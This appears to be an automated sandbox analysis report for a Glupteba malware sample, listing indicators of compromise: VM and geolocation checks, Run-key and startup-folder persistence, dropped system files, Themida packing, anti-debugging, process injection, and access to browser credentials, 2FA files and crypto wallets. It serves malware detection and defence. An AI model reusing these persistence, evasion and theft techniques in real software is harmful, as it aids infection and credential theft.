glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

System Information Discovery

Processes:

0NKIqxJZOxkSqcoqQk5gff41.exe9V6mnXHdynq1s7PpT244URZa.exe8md1vxAwe7Y0ndRiBYaafLjk.exeR4FS14llhaVLNhuh_1UBG_AQ.exevwqOzdi1PVwJK8OTScrNyxPr.exeCE4F.exeWgAQMBbuvnZa4Uim1cKe4vXj.exe6UIpSNXQ6X1bGK6xwzbZrjMo.exeOd44Rf8EHJH4T2sW1PLJmC6c.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0NKIqxJZOxkSqcoqQk5gff41.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9V6mnXHdynq1s7PpT244URZa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8md1vxAwe7Y0ndRiBYaafLjk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	R4FS14llhaVLNhuh_1UBG_AQ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	vwqOzdi1PVwJK8OTScrNyxPr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	CE4F.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WgAQMBbuvnZa4Uim1cKe4vXj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9V6mnXHdynq1s7PpT244URZa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8md1vxAwe7Y0ndRiBYaafLjk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	R4FS14llhaVLNhuh_1UBG_AQ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6UIpSNXQ6X1bGK6xwzbZrjMo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6UIpSNXQ6X1bGK6xwzbZrjMo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WgAQMBbuvnZa4Uim1cKe4vXj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0NKIqxJZOxkSqcoqQk5gff41.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Od44Rf8EHJH4T2sW1PLJmC6c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	CE4F.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Od44Rf8EHJH4T2sW1PLJmC6c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	vwqOzdi1PVwJK8OTScrNyxPr.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

RuntimeBroker.execmd.exeWeather.exeWeather.exeSetup (19).exextect12.exeGaemataeshani.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Weather.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Weather.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Setup (19).exe
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	xtect12.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Gaemataeshani.exe

Drops startup file 1 IoCs

Processes:

Esplorarne.exe.com

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iZpAWbaURv.url Esplorarne.exe.com

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iZpAWbaURv.url	Esplorarne.exe.com

Loads dropped DLL 64 IoCs

Processes:

DvMwGNgUky7bXWwCd2_zhu5C.tmprundll32.exeCleaner Installation.exeWEATHER Manager.tmpInlog.tmpVPN.tmpMediaBurner2.tmpLs6HCRy7CjYIm6XRO_DMyU5M.exeSetup.exeSetup.tmpSetup.tmpeHGLHEnRYqK4VhmYDOUgPfia.tmpEsplorarne.exe.comMsiExec.exeGameBoxWin64.exerundll32.exeMsiExec.exeMsiExec.exeMsiExec.exerundll32.exesvrwebui.exemask_svc.exeWeather_Installation.exe

pid	process
4372	DvMwGNgUky7bXWwCd2_zhu5C.tmp
4372	DvMwGNgUky7bXWwCd2_zhu5C.tmp
5148	rundll32.exe
6008	Cleaner Installation.exe
5540	WEATHER Manager.tmp
5540	WEATHER Manager.tmp
5280	Inlog.tmp
5280	Inlog.tmp
5616	VPN.tmp
5616	VPN.tmp
5032	MediaBurner2.tmp
508	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
508	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
7324	Setup.exe
7664	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
7492	eHGLHEnRYqK4VhmYDOUgPfia.tmp
7492	eHGLHEnRYqK4VhmYDOUgPfia.tmp
5580	Esplorarne.exe.com
5868	MsiExec.exe
5868	MsiExec.exe
5868	MsiExec.exe
8484	GameBoxWin64.exe
8484	GameBoxWin64.exe
6948	rundll32.exe
6312	MsiExec.exe
6312	MsiExec.exe
8484	GameBoxWin64.exe
6808	MsiExec.exe
6808	MsiExec.exe
4240	MsiExec.exe
4240	MsiExec.exe
4240	MsiExec.exe
4240	MsiExec.exe
4240	MsiExec.exe
4240	MsiExec.exe
6452	rundll32.exe
4240	MsiExec.exe
4240	MsiExec.exe
4240	MsiExec.exe
4240	MsiExec.exe
8416	svrwebui.exe
8416	svrwebui.exe
8416	svrwebui.exe
8416	svrwebui.exe
8416	svrwebui.exe
8416	svrwebui.exe
5152	mask_svc.exe
5152	mask_svc.exe
5152	mask_svc.exe
5152	mask_svc.exe
5152	mask_svc.exe
5152	mask_svc.exe
8052	Setup.tmp
8052	Setup.tmp
9124	Weather_Installation.exe
9124	Weather_Installation.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 11 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Documents\0NKIqxJZOxkSqcoqQk5gff41.exe	themida
C:\Users\Admin\Documents\WgAQMBbuvnZa4Uim1cKe4vXj.exe	themida
C:\Users\Admin\Documents\9V6mnXHdynq1s7PpT244URZa.exe	themida
C:\Users\Admin\Documents\9V6mnXHdynq1s7PpT244URZa.exe	themida
C:\Users\Admin\Documents\WgAQMBbuvnZa4Uim1cKe4vXj.exe	themida
C:\Users\Admin\Documents\0NKIqxJZOxkSqcoqQk5gff41.exe	themida
behavioral22/memory/3492-203-0x00000000012B0000-0x00000000012B1000-memory.dmp	themida
behavioral22/memory/2136-200-0x0000000000E20000-0x0000000000E21000-memory.dmp	themida
behavioral22/memory/3336-198-0x0000000000250000-0x0000000000251000-memory.dmp	themida
C:\Users\Admin\Documents\8md1vxAwe7Y0ndRiBYaafLjk.exe	themida
C:\Users\Admin\Documents\8md1vxAwe7Y0ndRiBYaafLjk.exe	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

aipackagechainer.exeWeather_Installation.exeRuntimeBroker.exeRuntimeBroker.exe7300426.exeConhost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run	aipackagechainer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\	aipackagechainer.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	Weather_Installation.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Weather = "C:\\Users\\Admin\\AppData\\Roaming\\Weather\\Weather.exe --Ac4FtzsAeC"	Weather_Installation.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ApplicationName = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker.exe"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ApplicationName = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker.exe"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	7300426.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\Molaraxepae.exe\""	Conhost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 12 IoCs

evasion trojan

System Information Discovery

Processes:

CE4F.exeWgAQMBbuvnZa4Uim1cKe4vXj.exe0NKIqxJZOxkSqcoqQk5gff41.exe8md1vxAwe7Y0ndRiBYaafLjk.exeR4FS14llhaVLNhuh_1UBG_AQ.exevwqOzdi1PVwJK8OTScrNyxPr.exeRuntimeBroker.exe9V6mnXHdynq1s7PpT244URZa.exemd8_8eus.exe6UIpSNXQ6X1bGK6xwzbZrjMo.exeOd44Rf8EHJH4T2sW1PLJmC6c.exemd7_7dfj.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	CE4F.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WgAQMBbuvnZa4Uim1cKe4vXj.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0NKIqxJZOxkSqcoqQk5gff41.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8md1vxAwe7Y0ndRiBYaafLjk.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	R4FS14llhaVLNhuh_1UBG_AQ.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	vwqOzdi1PVwJK8OTScrNyxPr.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RuntimeBroker.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9V6mnXHdynq1s7PpT244URZa.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md8_8eus.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6UIpSNXQ6X1bGK6xwzbZrjMo.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Od44Rf8EHJH4T2sW1PLJmC6c.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md7_7dfj.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

Cleaner Installation.exeSetup.exemsiexec.exeGameBoxWin64.exe

description	ioc	process
File opened (read-only)	\??\B:	Cleaner Installation.exe
File opened (read-only)	\??\M:	Setup.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	GameBoxWin64.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\K:	GameBoxWin64.exe
File opened (read-only)	\??\P:	Setup.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\A:	GameBoxWin64.exe
File opened (read-only)	\??\L:	Cleaner Installation.exe
File opened (read-only)	\??\R:	Cleaner Installation.exe
File opened (read-only)	\??\E:	Setup.exe
File opened (read-only)	\??\H:	Setup.exe
File opened (read-only)	\??\W:	GameBoxWin64.exe
File opened (read-only)	\??\X:	Cleaner Installation.exe
File opened (read-only)	\??\F:	Setup.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	GameBoxWin64.exe
File opened (read-only)	\??\R:	Setup.exe
File opened (read-only)	\??\S:	Setup.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\L:	GameBoxWin64.exe
File opened (read-only)	\??\O:	Cleaner Installation.exe
File opened (read-only)	\??\P:	Cleaner Installation.exe
File opened (read-only)	\??\O:	Setup.exe
File opened (read-only)	\??\Q:	Setup.exe
File opened (read-only)	\??\G:	GameBoxWin64.exe
File opened (read-only)	\??\J:	GameBoxWin64.exe
File opened (read-only)	\??\M:	GameBoxWin64.exe
File opened (read-only)	\??\T:	GameBoxWin64.exe
File opened (read-only)	\??\N:	Cleaner Installation.exe
File opened (read-only)	\??\J:	Setup.exe
File opened (read-only)	\??\Z:	Setup.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\Z:	GameBoxWin64.exe
File opened (read-only)	\??\Q:	Cleaner Installation.exe
File opened (read-only)	\??\B:	Setup.exe
File opened (read-only)	\??\N:	GameBoxWin64.exe
File opened (read-only)	\??\X:	GameBoxWin64.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	Cleaner Installation.exe
File opened (read-only)	\??\I:	Cleaner Installation.exe
File opened (read-only)	\??\U:	Setup.exe
File opened (read-only)	\??\W:	Setup.exe
File opened (read-only)	\??\F:	GameBoxWin64.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	Setup.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	GameBoxWin64.exe
File opened (read-only)	\??\Q:	GameBoxWin64.exe
File opened (read-only)	\??\F:	Cleaner Installation.exe
File opened (read-only)	\??\K:	Cleaner Installation.exe
File opened (read-only)	\??\M:	Cleaner Installation.exe
File opened (read-only)	\??\Y:	Cleaner Installation.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\U:	GameBoxWin64.exe
File opened (read-only)	\??\J:	Cleaner Installation.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 12 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
139	ipinfo.io
157	ip-api.com
246	ipinfo.io
374	ipinfo.io
378	ipinfo.io
29	ipinfo.io
30	ipinfo.io
137	ipinfo.io
194	ipinfo.io
202	ipinfo.io
207	ipinfo.io
213	ipinfo.io

Drops file in System32 directory 26 IoCs

Processes:

DrvInst.exetapinstall.exesvchost.exemask_svc.exesvchost.exesvchost32.execmd.exe

description	ioc	process
File created	C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\SET185A.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\SET1848.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\SET1859.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	tapinstall.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\SET185A.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	mask_svc.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 07D28FF30FFB6C9D	svchost.exe
File created	C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\SET1859.tmp	DrvInst.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.exe	svchost32.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.log	svchost32.exe
File created	C:\Windows\system32\services32.exe	cmd.exe
File opened for modification	C:\Windows\system32\services32.exe	cmd.exe
File opened for modification	C:\Windows\System32\Tasks\services32	svchost.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\SET1848.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\tap0901.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{0b45f349-f3ef-2d49-a867-3601d6895705}\tap0901.sys	DrvInst.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

Processes:

0NKIqxJZOxkSqcoqQk5gff41.exeWgAQMBbuvnZa4Uim1cKe4vXj.exe9V6mnXHdynq1s7PpT244URZa.exe8md1vxAwe7Y0ndRiBYaafLjk.exeR4FS14llhaVLNhuh_1UBG_AQ.exe6UIpSNXQ6X1bGK6xwzbZrjMo.exevwqOzdi1PVwJK8OTScrNyxPr.exeOd44Rf8EHJH4T2sW1PLJmC6c.exeCE4F.exemask_svc.exemask_svc.exemask_svc.exe

pid	process
2136	0NKIqxJZOxkSqcoqQk5gff41.exe
3336	WgAQMBbuvnZa4Uim1cKe4vXj.exe
3492	9V6mnXHdynq1s7PpT244URZa.exe
492	8md1vxAwe7Y0ndRiBYaafLjk.exe
7064	R4FS14llhaVLNhuh_1UBG_AQ.exe
6468	6UIpSNXQ6X1bGK6xwzbZrjMo.exe
7252	vwqOzdi1PVwJK8OTScrNyxPr.exe
7236	Od44Rf8EHJH4T2sW1PLJmC6c.exe
8868	CE4F.exe
3416	mask_svc.exe
2184	mask_svc.exe
5152	mask_svc.exe

Suspicious use of SetThreadContext 11 IoCs

Processes:

MCy69zYoC6A83qNV7PWC49cY.exegdCjIZ3vQLrTFWKdOezjL1wn.exeIvXEuwW59N_cXWlDbgjIyNx7.exesvchost.exe6LGTDlklqHr_ugBFTS3a5F3S.exevrLdEfNDqg6wjThV5I51bglQ.exezr97cx4azYVfX6pY_pzTXCPo.exeVHeR3A327UOUv2ALnQd1Z4r1.exelauncher.exelauncher.exeEsplorarne.exe.com

description	pid	process	target process
PID 2264 set thread context of 4380	2264	MCy69zYoC6A83qNV7PWC49cY.exe	MCy69zYoC6A83qNV7PWC49cY.exe
PID 2152 set thread context of 4396	2152	gdCjIZ3vQLrTFWKdOezjL1wn.exe	gdCjIZ3vQLrTFWKdOezjL1wn.exe
PID 2852 set thread context of 4564	2852	IvXEuwW59N_cXWlDbgjIyNx7.exe	IvXEuwW59N_cXWlDbgjIyNx7.exe
PID 3936 set thread context of 5340	3936	svchost.exe	svchost.exe
PID 4872 set thread context of 7084	4872	6LGTDlklqHr_ugBFTS3a5F3S.exe	6LGTDlklqHr_ugBFTS3a5F3S.exe
PID 5368 set thread context of 7724	5368	vrLdEfNDqg6wjThV5I51bglQ.exe	vrLdEfNDqg6wjThV5I51bglQ.exe
PID 5604 set thread context of 7792	5604	zr97cx4azYVfX6pY_pzTXCPo.exe	zr97cx4azYVfX6pY_pzTXCPo.exe
PID 7244 set thread context of 5820	7244	VHeR3A327UOUv2ALnQd1Z4r1.exe	VHeR3A327UOUv2ALnQd1Z4r1.exe
PID 8144 set thread context of 1784	8144	launcher.exe	launcher.exe
PID 7020 set thread context of 2608	7020	launcher.exe	launcher.exe
PID 7764 set thread context of 7828	7764	Esplorarne.exe.com	RegAsm.exe

Drops file in Program Files directory 64 IoCs

Processes:

Conhost.exeSetup.exemd7_7dfj.exeSetup.tmpmd8_8eus.exeyY2qmC4iOLBQc_v9oIAFRu3F.exeSetup.tmpultramediaburner.tmpSetup.exe

description	ioc	process
File created	C:\Program Files (x86)\Mozilla Maintenance Service\Molaraxepae.exe.config	Conhost.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe	Setup.exe
File created	C:\Program Files (x86)\GameBox INC\GameBox\tmp.edb	md7_7dfj.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\is-SSFR5.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-MNDE8.tmp	Setup.tmp
File created	C:\Program Files (x86)\Company\NewProduct\d.jfm	md8_8eus.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\d.jfm	md8_8eus.exe
File created	C:\Program Files (x86)\MaskVPN\is-GCNU2.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-2MCRV.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-KRMAV.tmp	Setup.tmp
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	yY2qmC4iOLBQc_v9oIAFRu3F.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-G3I0A.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-QTC8O.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\is-R43IO.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\is-D2K3V.tmp	Setup.tmp
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.dll	Setup.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	Setup.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\unins000.dat	Setup.tmp
File created	C:\Program Files (x86)\INL Corpo Brovse\is-4T7EM.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-VO1MB.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\unins000.msg	Setup.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\MaskVPN\is-U3FL4.tmp	Setup.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libCommon.dll	Setup.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-BR455.tmp	Setup.tmp
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\INL Corpo Brovse\libass.dll	Setup.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-1SKCL.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\is-BLR77.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-9QCJU.tmp	Setup.tmp
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jooyu.exe	yY2qmC4iOLBQc_v9oIAFRu3F.exe
File created	C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini	Setup.exe
File opened for modification	C:\Program Files (x86)\INL Corpo Brovse\libcueify.dll	Setup.tmp
File opened for modification	C:\Program Files (x86)\INL Corpo Brovse\unins000.dat	Setup.tmp
File created	C:\Program Files\MSBuild\XECLZJAKZJ\ultramediaburner.exe	Conhost.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe	Setup.exe
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-5GC8A.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-8GH2V.tmp	Setup.tmp
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe	Setup.exe
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-1MFSE.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\is-ANHMO.tmp	Setup.tmp
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe	Setup.exe
File created	C:\Program Files (x86)\MaskVPN\is-ISMC6.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-A55LO.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\is-B868P.tmp	Setup.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\unins000.dat	Setup.tmp
File opened for modification	C:\Program Files (x86)\Company\NewProduct\d	md8_8eus.exe
File opened for modification	C:\Program Files (x86)\INL Corpo Brovse\QtProfiler.exe	Setup.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-F5OD7.tmp	Setup.tmp
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	yY2qmC4iOLBQc_v9oIAFRu3F.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe	Setup.exe
File created	C:\Program Files (x86)\GameBox INC\GameBox\d.jfm	md7_7dfj.exe
File created	C:\Program Files (x86)\INL Corpo Brovse\is-0ODIC.tmp	Setup.tmp
File created	C:\Program Files (x86)\MaskVPN\is-LD6LP.tmp	Setup.tmp

Drops file in Windows directory 30 IoCs

Processes:

msiexec.exeMicrosoftEdge.exeDrvInst.exeMicrosoftEdge.exeMicrosoftEdge.exeexpand.exetapinstall.exemask_svc.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\MSIEF68.tmp	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
